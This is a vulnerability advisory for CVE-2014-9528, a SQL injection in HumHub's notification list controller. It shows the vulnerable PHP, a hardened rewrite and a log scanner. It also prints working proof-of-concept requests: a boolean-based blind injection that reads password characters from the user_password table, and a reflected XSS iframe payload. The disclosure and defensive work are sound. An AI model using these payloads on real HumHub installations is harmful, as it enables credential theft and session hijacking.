LEAKFREE-2014-005 / CVE-2014-9528

HumHub ListController::actionIndex() SQL Injection

[+] CVE: CVE-2014-9528
[+] LF-ID: LEAKFREE-2014-005
[+] CVSS: 7.5
[+] Vendor: HumHub
[+] Product: HumHub
[+] Versions affected: 0.10.0-rc1 and earlier

Vulnerability

The HumHub social networking kit, versions 0.10.0-rc.1 and prior, suffers from an SQL injection vulnerability in its notification listing functionality that allows an attacker to obtain backend database access. The issue has been resolved in cooperation with the vendor [1][2]. The vulnerable code is the actionIndex() function located in "/protected/modules_core/notification/controllers/ListController.php":


    /**
     * Returns a list of all notifications for a user
     */
    public function actionIndex()
    {
        // the id from the last entry loaded
        $lastEntryId = Yii::app()->request->getParam('from');
        // create database query
        $criteria = new CDbCriteria();
        if ($lastEntryId > 0) {
            // start from last entry id loaded
            // (unsanitized value concatenated into the SQL condition: the injection point)
            $criteria->condition = 'id<' . $lastEntryId;
        }
        $criteria->order = 'seen ASC, created_at DESC';
        $criteria->limit = 6;
        // safe query
        $notifications = Notification::model()->findAllByAttributes(array('user_id' => Yii::app()->user->id), $criteria);
        // variable for notification list
        $output = "";
        foreach ($notifications as $notification) {
            // format and save all entries
            $output .= $notification->getOut();
            // get the id from the last entry
            $lastEntryId = $notification->id;
        }
        // build json array
        $json = array();
        $json['output'] = $output;
        $json['lastEntryId'] = $lastEntryId;
        $json['counter'] = count($notifications);
        // return json
        echo CJSON::encode($json);
        // complete action
        Yii::app()->end();
    }

In this function, a check is performed on the unsanitized $lastEntryId variable (fetched from the 'from' GET parameter) to see whether it is greater than 0. However, because PHP compares an integer and a string loosely and $lastEntryId is not guaranteed to be an integer, an attacker can prefix a string of their choice with one or more digits (so that $lastEntryId is treated as a number during the comparison) such that the check evaluates to true, after which the otherwise unsanitized $lastEntryId is concatenated into $criteria->condition. The remainder of the string can therefore be arbitrary SQL.
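As an added illustration, and not HumHub's code or the vendor's actual fix (that is in the 0.10.0 release referenced below), the same action rewritten so that the 'from' parameter is validated as a whole positive integer and passed to the query as a bound parameter instead of being concatenated. The base class Controller and the helper name parseLastEntryId are assumptions; CDbCriteria::addCondition() and CDbCriteria::$params are Yii 1.1 API.

```php
<?php
// Added example, not HumHub's code and not the vendor's fix: a hardened
// version of the notification listing action. The 'from' parameter is
// validated as a whole positive integer and bound as a query parameter
// instead of being concatenated into the SQL condition.
// Base class Controller follows Yii 1.1 conventions; parseLastEntryId is an
// assumed helper name.

class ListController extends Controller
{
    /**
     * Strictly validate a "last entry id" taken from user input.
     * Returns the integer, or null when the input is not a positive integer.
     *
     * The original code used the loose comparison `$lastEntryId > 0`, which a
     * string such as "999) AND (1=1" satisfies because PHP reads its leading
     * digits as the number 999. FILTER_VALIDATE_INT rejects that string
     * outright, as well as "" and "12abc".
     */
    private static function parseLastEntryId($raw)
    {
        // getParam() may return an array (from[]=1); reject anything that is
        // not a scalar before validating.
        if (!is_string($raw) && !is_int($raw)) {
            return null;
        }
        $value = filter_var($raw, FILTER_VALIDATE_INT, array('options' => array('min_range' => 1)));
        return $value === false ? null : $value;
    }

    /**
     * Returns a list of all notifications for a user (hardened version).
     */
    public function actionIndex()
    {
        // the id of the last entry loaded, or null if absent or invalid
        $lastEntryId = self::parseLastEntryId(Yii::app()->request->getParam('from'));

        $criteria = new CDbCriteria();
        if ($lastEntryId !== null) {
            // Bind the value instead of concatenating it into the condition:
            // the driver receives the integer as a parameter, so it can never
            // change the structure of the query.
            $criteria->addCondition('id < :lastEntryId');
            $criteria->params[':lastEntryId'] = $lastEntryId;
        }
        $criteria->order = 'seen ASC, created_at DESC';
        $criteria->limit = 6;

        $notifications = Notification::model()->findAllByAttributes(
            array('user_id' => Yii::app()->user->id),
            $criteria
        );

        $output = "";
        foreach ($notifications as $notification) {
            // format and save all entries, remembering the id of the last one
            $output .= $notification->getOut();
            $lastEntryId = $notification->id;
        }

        $json = array(
            'output' => $output,
            'lastEntryId' => $lastEntryId,
            'counter' => count($notifications),
        );
        echo CJSON::encode($json);
        Yii::app()->end();
    }
}
```

Because invalid input is rejected before any query is built, this also closes the reflected cross-site scripting path described below: no SQL error containing the attacker's string is ever raised. Independently of the fix, Yii 1 database exceptions include the executed SQL in their message, so production deployments should not run with YII_DEBUG enabled, which is what lets such errors reach the browser.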

Proof of Concept SQL Injection

Performing the following request:


    index.php?r=notification/list/index&from=999) AND
    ( CASE WHEN 0x30 < (
        SELECT substring(password,1,1) FROM user_password WHERE id = 1
    ) THEN 1 ELSE 0 END)
    AND (1=1

allows an attacker to perform a boolean-based (binary search) SQL injection, in this case comparing the first character of the password column in user_password against a chosen value. In addition, the SQL error handling of the function in question reflects the injected input, allowing the attacker to perform a reflected Cross-Site Scripting attack.
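For defenders looking back through logs, the following added example (not part of the advisory) scans web-server access-log lines for requests to the r=notification/list/index route whose 'from' value is not a whole positive integer, which is exactly the property the vulnerable check fails to enforce. The log lines are constructed samples in combined log format and the function names are assumptions.

```php
<?php
// Added example, not part of the advisory: a small log scanner that flags
// requests to the notification list route whose 'from' value is not a whole
// positive integer. The access-log lines below are constructed samples in
// combined log format; the function names are assumptions.

/**
 * Extract the request target (path + query) from a combined-format log line,
 * or return null when the line does not contain a request.
 */
function extractRequestTarget($line)
{
    if (preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
        return $m[1];
    }
    return null;
}

/**
 * True when the request hits r=notification/list/index with a 'from' value
 * that is not a positive integer. parse_str() URL-decodes the values, so
 * encoded payloads (%20, %29, +) are inspected in their decoded form, which
 * is what the application itself sees.
 */
function isSuspiciousRequest($target)
{
    $query = parse_url($target, PHP_URL_QUERY);
    if (!is_string($query) || $query === '') {
        return false;
    }
    parse_str($query, $params);
    if (!isset($params['r'], $params['from']) || $params['r'] !== 'notification/list/index') {
        return false;
    }
    if (!is_string($params['from'])) {
        return true; // e.g. from[]=1, which the controller never expected
    }
    return filter_var($params['from'], FILTER_VALIDATE_INT, array('options' => array('min_range' => 1))) === false;
}

/**
 * Return the log lines that should be reviewed.
 */
function scanLog(array $lines)
{
    $flagged = array();
    foreach ($lines as $line) {
        $target = extractRequestTarget($line);
        if ($target !== null && isSuspiciousRequest($target)) {
            $flagged[] = $line;
        }
    }
    return $flagged;
}

// Constructed sample lines (203.0.113.0/24 and 198.51.100.0/24 are documentation ranges).
$sampleLog = array(
    '203.0.113.5 - - [10/Jan/2015:12:00:01 +0000] "GET /index.php?r=notification/list/index&from=42 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Jan/2015:12:00:02 +0000] "GET /index.php?r=notification/list/index&from=999)%20AND%20(1=1 HTTP/1.1" 500 1301',
    '203.0.113.5 - - [10/Jan/2015:12:00:03 +0000] "GET /index.php?r=notification/list/index&from=999%29%20AND%20%28%22%3Ciframe%3E%22%3D%22 HTTP/1.1" 500 1322',
    '198.51.100.7 - - [10/Jan/2015:12:00:04 +0000] "GET /index.php?r=user/auth/login HTTP/1.1" 200 2048',
);

// The second and third lines are flagged; the first (from=42) and fourth are not.
foreach (scanLog($sampleLog) as $line) {
    echo "REVIEW: " . $line . "\n";
}
```

Two caveats: Yii 1's CHttpRequest::getParam() falls back to $_POST when the name is absent from $_GET, so a payload delivered in a POST body will not show up in the access log's request line at all; and the HTTP status is not a reliable signal, since a boolean-based injection that evaluates cleanly returns 200 just like a legitimate request. Matching on the decoded parameter value rather than on the status code is what makes the check useful.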

Proof of Concept Cross-site Scripting


    index.php/?r=notification/list/index&from=999) AND
    ("<iframe src ='index.php/?r=user/auth/logout'>"=""

Mitigation

Upgrade to HumHub version 0.10.0 [2]

References

1. https://www.humhub.org/

2. https://github.com/humhub/humhub/releases/tag/v0.10.0

Contact

For more information or a no-obligation quote, you can contact us at contact@leakfree.nl (PGP)